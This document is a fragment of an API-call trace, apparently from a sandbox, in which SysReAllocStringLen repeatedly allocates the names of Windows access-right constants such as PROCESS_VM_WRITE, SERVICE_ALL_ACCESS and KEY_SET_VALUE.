[0110.361] SysReAllocStringLen (in: pbstr=0x2b2e640*=0x0, psz="JOB_OBJECT_ALL_ACCESS", len=0x15 | out: pbstr=0x2b2e640*="JOB_OBJECT_ALL_ACCESS") returned 1
[0110.361] SysReAllocStringLen (in: pbstr=0x2b2e630*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2b2e630*="STANDARD_RIGHTS_EXECUTE") returned 1
[0110.361] SysReAllocStringLen (in: pbstr=0x2b2e620*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2b2e620*="STANDARD_RIGHTS_WRITE") returned 1
[0110.361] SysReAllocStringLen (in: pbstr=0x2b2e610*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2b2e610*="STANDARD_RIGHTS_READ") returned 1
[0110.361] SysReAllocStringLen (in: pbstr=0x2b2e600*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2b2e600*="STANDARD_RIGHTS_ALL") returned 1
[0110.361] SysReAllocStringLen (in: pbstr=0x2b2e5f0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2b2e5f0*="DELETE") returned 1
[0110.361] SysReAllocStringLen (in: pbstr=0x2b2e5e0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2b2e5e0*="READ_CONTROL") returned 1
[0110.361] SysReAllocStringLen (in: pbstr=0x2b2e5d0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2b2e5d0*="WRITE_OWNER") returned 1
[0110.361] SysReAllocStringLen (in: pbstr=0x2b2e5c0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2b2e5c0*="WRITE_DAC") returned 1
[0110.361] SysReAllocStringLen (in: pbstr=0x2b2e5b0*=0x0, psz="THREAD_DIRECT_IMPERSONATION", len=0x1b | out: pbstr=0x2b2e5b0*="THREAD_DIRECT_IMPERSONATION") returned 1
[0110.361] SysReAllocStringLen (in: pbstr=0x2b2e5a0*=0x0, psz="THREAD_IMPERSONATE", len=0x12 | out: pbstr=0x2b2e5a0*="THREAD_IMPERSONATE") returned 1
[0110.361] SysReAllocStringLen (in: pbstr=0x2b2e590*=0x0, psz="THREAD_SET_THREAD_TOKEN", len=0x17 | out: pbstr=0x2b2e590*="THREAD_SET_THREAD_TOKEN") returned 1
[0110.361] SysReAllocStringLen (in: pbstr=0x2b2e580*=0x0, psz="THREAD_QUERY_INFORMATION", len=0x18 | out: pbstr=0x2b2e580*="THREAD_QUERY_INFORMATION") returned 1
[0110.361] SysReAllocStringLen (in: pbstr=0x2b2e570*=0x0, psz="THREAD_SET_INFORMATION", len=0x16 | out: pbstr=0x2b2e570*="THREAD_SET_INFORMATION") returned 1
[0110.361] SysReAllocStringLen (in: pbstr=0x2b2e560*=0x0, psz="THREAD_SET_CONTEXT", len=0x12 | out: pbstr=0x2b2e560*="THREAD_SET_CONTEXT") returned 1
[0110.361] SysReAllocStringLen (in: pbstr=0x2b2e550*=0x0, psz="THREAD_GET_CONTEXT", len=0x12 | out: pbstr=0x2b2e550*="THREAD_GET_CONTEXT") returned 1
[0110.361] SysReAllocStringLen (in: pbstr=0x2b2e540*=0x0, psz="THREAD_SUSPEND_RESUME", len=0x15 | out: pbstr=0x2b2e540*="THREAD_SUSPEND_RESUME") returned 1
[0110.361] SysReAllocStringLen (in: pbstr=0x2b2e530*=0x0, psz="THREAD_TERMINATE", len=0x10 | out: pbstr=0x2b2e530*="THREAD_TERMINATE") returned 1
[0110.361] SysReAllocStringLen (in: pbstr=0x2b2e520*=0x0, psz="THREAD_ALL_ACCESS", len=0x11 | out: pbstr=0x2b2e520*="THREAD_ALL_ACCESS") returned 1
[0110.361] SysReAllocStringLen (in: pbstr=0x2b2e510*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2b2e510*="STANDARD_RIGHTS_EXECUTE") returned 1
[0110.361] SysReAllocStringLen (in: pbstr=0x2b2e500*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2b2e500*="STANDARD_RIGHTS_WRITE") returned 1
[0110.361] SysReAllocStringLen (in: pbstr=0x2b2e4f0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2b2e4f0*="STANDARD_RIGHTS_READ") returned 1
[0110.361] SysReAllocStringLen (in: pbstr=0x2b2e4e0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2b2e4e0*="STANDARD_RIGHTS_ALL") returned 1
[0110.361] SysReAllocStringLen (in: pbstr=0x2b2e4d0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2b2e4d0*="DELETE") returned 1
[0110.361] SysReAllocStringLen (in: pbstr=0x2b2e4c0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2b2e4c0*="READ_CONTROL") returned 1
[0110.361] SysReAllocStringLen (in: pbstr=0x2b2e4b0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2b2e4b0*="WRITE_OWNER") returned 1
[0110.361] SysReAllocStringLen (in: pbstr=0x2b2e4a0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2b2e4a0*="WRITE_DAC") returned 1
[0110.361] SysReAllocStringLen (in: pbstr=0x2b2e490*=0x0, psz="PROCESS_QUERY_INFORMATION", len=0x19 | out: pbstr=0x2b2e490*="PROCESS_QUERY_INFORMATION") returned 1
[0110.361] SysReAllocStringLen (in: pbstr=0x2b2e480*=0x0, psz="PROCESS_SET_INFORMATION", len=0x17 | out: pbstr=0x2b2e480*="PROCESS_SET_INFORMATION") returned 1
[0110.361] SysReAllocStringLen (in: pbstr=0x2b2e470*=0x0, psz="PROCESS_SET_QUOTA", len=0x11 | out: pbstr=0x2b2e470*="PROCESS_SET_QUOTA") returned 1
[0110.361] SysReAllocStringLen (in: pbstr=0x2b2e460*=0x0, psz="PROCESS_CREATE_PROCESS", len=0x16 | out: pbstr=0x2b2e460*="PROCESS_CREATE_PROCESS") returned 1
[0110.361] SysReAllocStringLen (in: pbstr=0x2b2e450*=0x0, psz="PROCESS_DUP_HANDLE", len=0x12 | out: pbstr=0x2b2e450*="PROCESS_DUP_HANDLE") returned 1
[0110.361] SysReAllocStringLen (in: pbstr=0x2b2e440*=0x0, psz="PROCESS_VM_WRITE", len=0x10 | out: pbstr=0x2b2e440*="PROCESS_VM_WRITE") returned 1
[0110.361] SysReAllocStringLen (in: pbstr=0x2b2e430*=0x0, psz="PROCESS_VM_READ", len=0xf | out: pbstr=0x2b2e430*="PROCESS_VM_READ") returned 1
[0110.362] SysReAllocStringLen (in: pbstr=0x2b2e420*=0x0, psz="PROCESS_VM_OPERATION", len=0x14 | out: pbstr=0x2b2e420*="PROCESS_VM_OPERATION") returned 1
[0110.362] SysReAllocStringLen (in: pbstr=0x2b2e410*=0x0, psz="PROCESS_SET_SESSIONID", len=0x15 | out: pbstr=0x2b2e410*="PROCESS_SET_SESSIONID") returned 1
[0110.362] SysReAllocStringLen (in: pbstr=0x2b2e400*=0x0, psz="PROCESS_CREATE_THREAD", len=0x15 | out: pbstr=0x2b2e400*="PROCESS_CREATE_THREAD") returned 1
[0110.362] SysReAllocStringLen (in: pbstr=0x2b2e3f0*=0x0, psz="PROCESS_TERMINATE", len=0x11 | out: pbstr=0x2b2e3f0*="PROCESS_TERMINATE") returned 1
[0110.362] SysReAllocStringLen (in: pbstr=0x2b2e3e0*=0x0, psz="PROCESS_ALL_ACCESS", len=0x12 | out: pbstr=0x2b2e3e0*="PROCESS_ALL_ACCESS") returned 1
[0110.362] SysReAllocStringLen (in: pbstr=0x2b2e3d0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2b2e3d0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0110.362] SysReAllocStringLen (in: pbstr=0x2b2e3c0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2b2e3c0*="STANDARD_RIGHTS_WRITE") returned 1
[0110.362] SysReAllocStringLen (in: pbstr=0x2b2e3b0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2b2e3b0*="STANDARD_RIGHTS_READ") returned 1
[0110.362] SysReAllocStringLen (in: pbstr=0x2b2e3a0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2b2e3a0*="STANDARD_RIGHTS_ALL") returned 1
[0110.362] SysReAllocStringLen (in: pbstr=0x2b2e390*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2b2e390*="DELETE") returned 1
[0110.362] SysReAllocStringLen (in: pbstr=0x2b2e380*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2b2e380*="READ_CONTROL") returned 1
[0110.362] SysReAllocStringLen (in: pbstr=0x2b2e370*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2b2e370*="WRITE_OWNER") returned 1
[0110.362] SysReAllocStringLen (in: pbstr=0x2b2e360*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2b2e360*="WRITE_DAC") returned 1
[0110.362] SysReAllocStringLen (in: pbstr=0x2b2e350*=0x0, psz="PERM_FILE_CREATE", len=0x10 | out: pbstr=0x2b2e350*="PERM_FILE_CREATE") returned 1
[0110.362] SysReAllocStringLen (in: pbstr=0x2b2e340*=0x0, psz="PERM_FILE_WRITE", len=0xf | out: pbstr=0x2b2e340*="PERM_FILE_WRITE") returned 1
[0110.362] SysReAllocStringLen (in: pbstr=0x2b2e330*=0x0, psz="PERM_FILE_READ", len=0xe | out: pbstr=0x2b2e330*="PERM_FILE_READ") returned 1
[0110.362] SysReAllocStringLen (in: pbstr=0x2b2e320*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2b2e320*="STANDARD_RIGHTS_EXECUTE") returned 1
[0110.362] SysReAllocStringLen (in: pbstr=0x2b2e310*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2b2e310*="STANDARD_RIGHTS_WRITE") returned 1
[0110.362] SysReAllocStringLen (in: pbstr=0x2b2e300*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2b2e300*="STANDARD_RIGHTS_READ") returned 1
[0110.362] SysReAllocStringLen (in: pbstr=0x2b2e2f0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2b2e2f0*="STANDARD_RIGHTS_ALL") returned 1
[0110.362] SysReAllocStringLen (in: pbstr=0x2b2e2e0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2b2e2e0*="DELETE") returned 1
[0110.362] SysReAllocStringLen (in: pbstr=0x2b2e2d0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2b2e2d0*="READ_CONTROL") returned 1
[0110.362] SysReAllocStringLen (in: pbstr=0x2b2e2c0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2b2e2c0*="WRITE_OWNER") returned 1
[0110.362] SysReAllocStringLen (in: pbstr=0x2b2e2b0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2b2e2b0*="WRITE_DAC") returned 1
[0110.362] SysReAllocStringLen (in: pbstr=0x2b2e2a0*=0x0, psz="JOB_ACCESS_ADMINISTER", len=0x15 | out: pbstr=0x2b2e2a0*="JOB_ACCESS_ADMINISTER") returned 1
[0110.362] SysReAllocStringLen (in: pbstr=0x2b2e290*=0x0, psz="PRINTER_ACCESS_USE", len=0x12 | out: pbstr=0x2b2e290*="PRINTER_ACCESS_USE") returned 1
[0110.362] SysReAllocStringLen (in: pbstr=0x2b2e280*=0x0, psz="PRINTER_ACCESS_ADMINISTER", len=0x19 | out: pbstr=0x2b2e280*="PRINTER_ACCESS_ADMINISTER") returned 1
[0110.362] SysReAllocStringLen (in: pbstr=0x2b2e270*=0x0, psz="SERVER_ACCESS_ENUMERATE", len=0x17 | out: pbstr=0x2b2e270*="SERVER_ACCESS_ENUMERATE") returned 1
[0110.362] SysReAllocStringLen (in: pbstr=0x2b2e260*=0x0, psz="SERVER_ACCESS_ADMINISTER", len=0x18 | out: pbstr=0x2b2e260*="SERVER_ACCESS_ADMINISTER") returned 1
[0110.362] SysReAllocStringLen (in: pbstr=0x2b2e250*=0x0, psz="PRINTER_ALL_ACCESS", len=0x12 | out: pbstr=0x2b2e250*="PRINTER_ALL_ACCESS") returned 1
[0110.362] SysReAllocStringLen (in: pbstr=0x2b2e240*=0x0, psz="PRINTER_EXECUTE", len=0xf | out: pbstr=0x2b2e240*="PRINTER_EXECUTE") returned 1
[0110.362] SysReAllocStringLen (in: pbstr=0x2b2e230*=0x0, psz="PRINTER_WRITE", len=0xd | out: pbstr=0x2b2e230*="PRINTER_WRITE") returned 1
[0110.362] SysReAllocStringLen (in: pbstr=0x2b2e220*=0x0, psz="PRINTER_READ", len=0xc | out: pbstr=0x2b2e220*="PRINTER_READ") returned 1
[0110.363] SysReAllocStringLen (in: pbstr=0x2b2e210*=0x0, psz="PRINTER_ALL_ACCESS", len=0x12 | out: pbstr=0x2b2e210*="PRINTER_ALL_ACCESS") returned 1
[0110.363] SysReAllocStringLen (in: pbstr=0x2b2e200*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2b2e200*="DELETE") returned 1
[0110.363] SysReAllocStringLen (in: pbstr=0x2b2e1f0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2b2e1f0*="READ_CONTROL") returned 1
[0110.363] SysReAllocStringLen (in: pbstr=0x2b2e1e0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2b2e1e0*="WRITE_OWNER") returned 1
[0110.363] SysReAllocStringLen (in: pbstr=0x2b2e1d0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2b2e1d0*="WRITE_DAC") returned 1
[0110.363] SysReAllocStringLen (in: pbstr=0x2b2e1c0*=0x0, psz="SC_MANAGER_QUERY_LOCK_STATUS", len=0x1c | out: pbstr=0x2b2e1c0*="SC_MANAGER_QUERY_LOCK_STATUS") returned 1
[0110.363] SysReAllocStringLen (in: pbstr=0x2b2e1b0*=0x0, psz="SC_MANAGER_MODIFY_BOOT_CONFIG", len=0x1d | out: pbstr=0x2b2e1b0*="SC_MANAGER_MODIFY_BOOT_CONFIG") returned 1
[0110.363] SysReAllocStringLen (in: pbstr=0x2b2e1a0*=0x0, psz="SC_MANAGER_LOCK", len=0xf | out: pbstr=0x2b2e1a0*="SC_MANAGER_LOCK") returned 1
[0110.363] SysReAllocStringLen (in: pbstr=0x2b2e190*=0x0, psz="SC_MANAGER_ENUMERATE_SERVICE", len=0x1c | out: pbstr=0x2b2e190*="SC_MANAGER_ENUMERATE_SERVICE") returned 1
[0110.363] SysReAllocStringLen (in: pbstr=0x2b2e180*=0x0, psz="SC_MANAGER_CONNECT", len=0x12 | out: pbstr=0x2b2e180*="SC_MANAGER_CONNECT") returned 1
[0110.363] SysReAllocStringLen (in: pbstr=0x2b2e170*=0x0, psz="SC_MANAGER_CREATE_SERVICE", len=0x19 | out: pbstr=0x2b2e170*="SC_MANAGER_CREATE_SERVICE") returned 1
[0110.363] SysReAllocStringLen (in: pbstr=0x2b2e160*=0x0, psz="SC_MANAGER_ALL_ACCESS", len=0x15 | out: pbstr=0x2b2e160*="SC_MANAGER_ALL_ACCESS") returned 1
[0110.363] SysReAllocStringLen (in: pbstr=0x2b2e150*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2b2e150*="STANDARD_RIGHTS_EXECUTE") returned 1
[0110.363] SysReAllocStringLen (in: pbstr=0x2b2e140*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2b2e140*="STANDARD_RIGHTS_WRITE") returned 1
[0110.363] SysReAllocStringLen (in: pbstr=0x2b2e130*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2b2e130*="STANDARD_RIGHTS_READ") returned 1
[0110.363] SysReAllocStringLen (in: pbstr=0x2b2e120*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2b2e120*="STANDARD_RIGHTS_ALL") returned 1
[0110.363] SysReAllocStringLen (in: pbstr=0x2b2e110*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2b2e110*="DELETE") returned 1
[0110.363] SysReAllocStringLen (in: pbstr=0x2b2e100*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2b2e100*="READ_CONTROL") returned 1
[0110.363] SysReAllocStringLen (in: pbstr=0x2b2e0f0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2b2e0f0*="WRITE_OWNER") returned 1
[0110.363] SysReAllocStringLen (in: pbstr=0x2b2e0e0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2b2e0e0*="WRITE_DAC") returned 1
[0110.363] SysReAllocStringLen (in: pbstr=0x2b2e0d0*=0x0, psz="SERVICE_USER_DEFINED_CONTROL", len=0x1c | out: pbstr=0x2b2e0d0*="SERVICE_USER_DEFINED_CONTROL") returned 1
[0110.363] SysReAllocStringLen (in: pbstr=0x2b2e0c0*=0x0, psz="SERVICE_STOP", len=0xc | out: pbstr=0x2b2e0c0*="SERVICE_STOP") returned 1
[0110.363] SysReAllocStringLen (in: pbstr=0x2b2e0b0*=0x0, psz="SERVICE_START", len=0xd | out: pbstr=0x2b2e0b0*="SERVICE_START") returned 1
[0110.363] SysReAllocStringLen (in: pbstr=0x2b2e0a0*=0x0, psz="SERVICE_QUERY_STATUS", len=0x14 | out: pbstr=0x2b2e0a0*="SERVICE_QUERY_STATUS") returned 1
[0110.363] SysReAllocStringLen (in: pbstr=0x2b2e090*=0x0, psz="SERVICE_QUERY_CONFIG", len=0x14 | out: pbstr=0x2b2e090*="SERVICE_QUERY_CONFIG") returned 1
[0110.363] SysReAllocStringLen (in: pbstr=0x2b2e080*=0x0, psz="SERVICE_PAUSE_CONTINUE", len=0x16 | out: pbstr=0x2b2e080*="SERVICE_PAUSE_CONTINUE") returned 1
[0110.364] SysReAllocStringLen (in: pbstr=0x2b2e070*=0x0, psz="SERVICE_INTERROGATE", len=0x13 | out: pbstr=0x2b2e070*="SERVICE_INTERROGATE") returned 1
[0110.364] SysReAllocStringLen (in: pbstr=0x2b2e060*=0x0, psz="SERVICE_ENUMERATE_DEPENDENTS", len=0x1c | out: pbstr=0x2b2e060*="SERVICE_ENUMERATE_DEPENDENTS") returned 1
[0110.364] SysReAllocStringLen (in: pbstr=0x2b2e050*=0x0, psz="SERVICE_CHANGE_CONFIG", len=0x15 | out: pbstr=0x2b2e050*="SERVICE_CHANGE_CONFIG") returned 1
[0110.364] SysReAllocStringLen (in: pbstr=0x2b2e040*=0x0, psz="SERVICE_ALL_ACCESS", len=0x12 | out: pbstr=0x2b2e040*="SERVICE_ALL_ACCESS") returned 1
[0110.364] SysReAllocStringLen (in: pbstr=0x2b2e030*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2b2e030*="STANDARD_RIGHTS_EXECUTE") returned 1
[0110.364] SysReAllocStringLen (in: pbstr=0x2b2e020*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2b2e020*="STANDARD_RIGHTS_WRITE") returned 1
[0110.364] SysReAllocStringLen (in: pbstr=0x2b2e010*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2b2e010*="STANDARD_RIGHTS_READ") returned 1
[0110.364] SysReAllocStringLen (in: pbstr=0x2b2e000*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2b2e000*="STANDARD_RIGHTS_ALL") returned 1
[0110.364] SysReAllocStringLen (in: pbstr=0x2b2dff0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2b2dff0*="DELETE") returned 1
[0110.364] SysReAllocStringLen (in: pbstr=0x2b2dfe0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2b2dfe0*="READ_CONTROL") returned 1
[0110.364] SysReAllocStringLen (in: pbstr=0x2b2dfd0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2b2dfd0*="WRITE_OWNER") returned 1
[0110.364] SysReAllocStringLen (in: pbstr=0x2b2dfc0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2b2dfc0*="WRITE_DAC") returned 1
[0110.364] SysReAllocStringLen (in: pbstr=0x2b2dfb0*=0x0, psz="KEY_SET_VALUE", len=0xd | out: pbstr=0x2b2dfb0*="KEY_SET_VALUE") returned 1
[0110.364] SysReAllocStringLen (in: pbstr=0x2b2dfa0*=0x0, psz="KEY_CREATE_LINK", len=0xf | out: pbstr=0x2b2dfa0*="KEY_CREATE_LINK") returned 1
[0110.364] SysReAllocStringLen (in: pbstr=0x2b2df90*=0x0, psz="KEY_CREATE_SUB_KEY", len=0x12 | out: pbstr=0x2b2df90*="KEY_CREATE_SUB_KEY") returned 1
[0110.364] SysReAllocStringLen (in: pbstr=0x2b2df80*=0x0, psz="KEY_NOTIFY", len=0xa | out: pbstr=0x2b2df80*="KEY_NOTIFY") returned 1
[0110.364] SysReAllocStringLen (in: pbstr=0x2b2df70*=0x0, psz="KEY_ENUMERATE_SUB_KEYS", len=0x16 | out: pbstr=0x2b2df70*="KEY_ENUMERATE_SUB_KEYS") returned 1
[0110.364] SysReAllocStringLen (in: pbstr=0x2b2df60*=0x0, psz="KEY_QUERY_VALUE", len=0xf | out: pbstr=0x2b2df60*="KEY_QUERY_VALUE") returned 1
[0110.364] SysReAllocStringLen (in: pbstr=0x2b2df50*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2b2df50*="STANDARD_RIGHTS_EXECUTE") returned 1
[0110.364] SysReAllocStringLen (in: pbstr=0x2b2df40*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2b2df40*="STANDARD_RIGHTS_WRITE") returned 1
[0110.364] SysReAllocStringLen (in: pbstr=0x2b2df30*=0x0, psz="STANDARD_RIGHTS_READ 2", len=0x16 | out: pbstr=0x2b2df30*="STANDARD_RIGHTS_READ 2") returned 1
[0110.364] SysReAllocStringLen (in: pbstr=0x2b2df20*=0x0, psz="STANDARD_RIGHTS_ALL 1", len=0x15 | out: pbstr=0x2b2df20*="STANDARD_RIGHTS_ALL 1") returned 1
[0110.364] SysReAllocStringLen (in: pbstr=0x2b2df10*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2b2df10*="DELETE") returned 1
[0110.364] SysReAllocStringLen (in: pbstr=0x2b2df00*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2b2df00*="READ_CONTROL") returned 1
[0110.364] SysReAllocStringLen (in: pbstr=0x2b2def0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2b2def0*="WRITE_OWNER") returned 1
[0110.364] SysReAllocStringLen (in: pbstr=0x2b2dee0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2b2dee0*="WRITE_DAC") returned 1
[0110.364] SysReAllocStringLen (in: pbstr=0x2b2ded0*=0x0, psz="DESKTOP_SWITCHDESKTOP", len=0x15 | out: pbstr=0x2b2ded0*="DESKTOP_SWITCHDESKTOP") returned 1
[0110.364] SysReAllocStringLen (in: pbstr=0x2b2dec0*=0x0, psz="DESKTOP_WRITEOBJECTS", len=0x14 | out: pbstr=0x2b2dec0*="DESKTOP_WRITEOBJECTS") returned 1
[0110.364] SysReAllocStringLen (in: pbstr=0x2b2deb0*=0x0, psz="DESKTOP_JOURNALRECORD", len=0x15 | out: pbstr=0x2b2deb0*="DESKTOP_JOURNALRECORD") returned 1
[0110.364] SysReAllocStringLen (in: pbstr=0x2b2dea0*=0x0, psz="DESKTOP_JOURNALPLAYBACK", len=0x17 | out: pbstr=0x2b2dea0*="DESKTOP_JOURNALPLAYBACK") returned 1
[0110.365] SysReAllocStringLen (in: pbstr=0x2b2de90*=0x0, psz="DESKTOP_HOOKCONTROL", len=0x13 | out: pbstr=0x2b2de90*="DESKTOP_HOOKCONTROL") returned 1
[0110.365] SysReAllocStringLen (in: pbstr=0x2b2de80*=0x0, psz="DESKTOP_CREATEWINDOW", len=0x14 | out: pbstr=0x2b2de80*="DESKTOP_CREATEWINDOW") returned 1
[0110.365] SysReAllocStringLen (in: pbstr=0x2b2de70*=0x0, psz="DESKTOP_CREATEMENU", len=0x12 | out: pbstr=0x2b2de70*="DESKTOP_CREATEMENU") returned 1
[0110.365] SysReAllocStringLen (in: pbstr=0x2b2de60*=0x0, psz="DESKTOP_READOBJECTS", len=0x13 | out: pbstr=0x2b2de60*="DESKTOP_READOBJECTS") returned 1
[0110.365] SysReAllocStringLen (in: pbstr=0x2b2de50*=0x0, psz="DESKTOP_ENUMERATE", len=0x11 | out: pbstr=0x2b2de50*="DESKTOP_ENUMERATE") returned 1
[0110.365] SysReAllocStringLen (in: pbstr=0x2b2de40*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2b2de40*="STANDARD_RIGHTS_EXECUTE") returned 1
[0110.365] SysReAllocStringLen (in: pbstr=0x2b2de30*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2b2de30*="STANDARD_RIGHTS_WRITE") returned 1
[0110.365] SysReAllocStringLen (in: pbstr=0x2b2de20*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2b2de20*="STANDARD_RIGHTS_READ") returned 1
[0110.365] SysReAllocStringLen (in: pbstr=0x2b2de10*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2b2de10*="STANDARD_RIGHTS_ALL") returned 1
[0110.365] SysReAllocStringLen (in: pbstr=0x2b2de00*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2b2de00*="DELETE") returned 1
[0110.365] SysReAllocStringLen (in: pbstr=0x2b2ddf0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2b2ddf0*="READ_CONTROL") returned 1
[0110.365] SysReAllocStringLen (in: pbstr=0x2b2dde0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2b2dde0*="WRITE_OWNER") returned 1
[0110.365] SysReAllocStringLen (in: pbstr=0x2b2ddd0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2b2ddd0*="WRITE_DAC") returned 1
[0110.365] SysReAllocStringLen (in: pbstr=0x2b2ddc0*=0x0, psz="WINSTA_WRITEATTRIBUTES", len=0x16 | out: pbstr=0x2b2ddc0*="WINSTA_WRITEATTRIBUTES") returned 1
[0110.365] SysReAllocStringLen (in: pbstr=0x2b2ddb0*=0x0, psz="WINSTA_READSCREEN", len=0x11 | out: pbstr=0x2b2ddb0*="WINSTA_READSCREEN") returned 1
[0110.365] SysReAllocStringLen (in: pbstr=0x2b2dda0*=0x0, psz="WINSTA_READATTRIBUTES", len=0x15 | out: pbstr=0x2b2dda0*="WINSTA_READATTRIBUTES") returned 1
[0110.365] SysReAllocStringLen (in: pbstr=0x2b2dd90*=0x0, psz="WINSTA_EXITWINDOWS", len=0x12 | out: pbstr=0x2b2dd90*="WINSTA_EXITWINDOWS") returned 1
[0110.365] SysReAllocStringLen (in: pbstr=0x2b2dd80*=0x0, psz="WINSTA_ENUMERATE", len=0x10 | out: pbstr=0x2b2dd80*="WINSTA_ENUMERATE") returned 1
[0110.365] SysReAllocStringLen (in: pbstr=0x2b2dd70*=0x0, psz="WINSTA_ENUMDESKTOPS", len=0x13 | out: pbstr=0x2b2dd70*="WINSTA_ENUMDESKTOPS") returned 1
[0110.365] SysReAllocStringLen (in: pbstr=0x2b2dd60*=0x0, psz="WINSTA_CREATEDESKTOP", len=0x14 | out: pbstr=0x2b2dd60*="WINSTA_CREATEDESKTOP") returned 1
[0110.365] SysReAllocStringLen (in: pbstr=0x2b2dd50*=0x0, psz="WINSTA_ACCESSGLOBALATOMS", len=0x18 | out: pbstr=0x2b2dd50*="WINSTA_ACCESSGLOBALATOMS") returned 1
[0110.365] SysReAllocStringLen (in: pbstr=0x2b2dd40*=0x0, psz="WINSTA_ACCESSCLIPBOARD", len=0x16 | out: pbstr=0x2b2dd40*="WINSTA_ACCESSCLIPBOARD") returned 1
[0110.365] SysReAllocStringLen (in: pbstr=0x2b2dd30*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2b2dd30*="STANDARD_RIGHTS_EXECUTE") returned 1
[0110.365] SysReAllocStringLen (in: pbstr=0x2b2dd20*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2b2dd20*="STANDARD_RIGHTS_WRITE") returned 1
[0110.365] SysReAllocStringLen (in: pbstr=0x2b2dd10*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2b2dd10*="STANDARD_RIGHTS_READ") returned 1
[0110.365] SysReAllocStringLen (in: pbstr=0x2b2dd00*=0x0, psz="STANDARD_RIGHTS_REQUIRED", len=0x18 | out: pbstr=0x2b2dd00*="STANDARD_RIGHTS_REQUIRED") returned 1
[0110.365] SysReAllocStringLen (in: pbstr=0x2b2dcf0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2b2dcf0*="READ_CONTROL") returned 1
[0110.365] SysReAllocStringLen (in: pbstr=0x2b2dce0*=0x0, psz="SI_ACCESS_SPECIFIC", len=0x12 | out: pbstr=0x2b2dce0*="SI_ACCESS_SPECIFIC") returned 1
[0110.365] SysReAllocStringLen (in: pbstr=0x2b2dcd0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2b2dcd0*="WRITE_DAC") returned 1
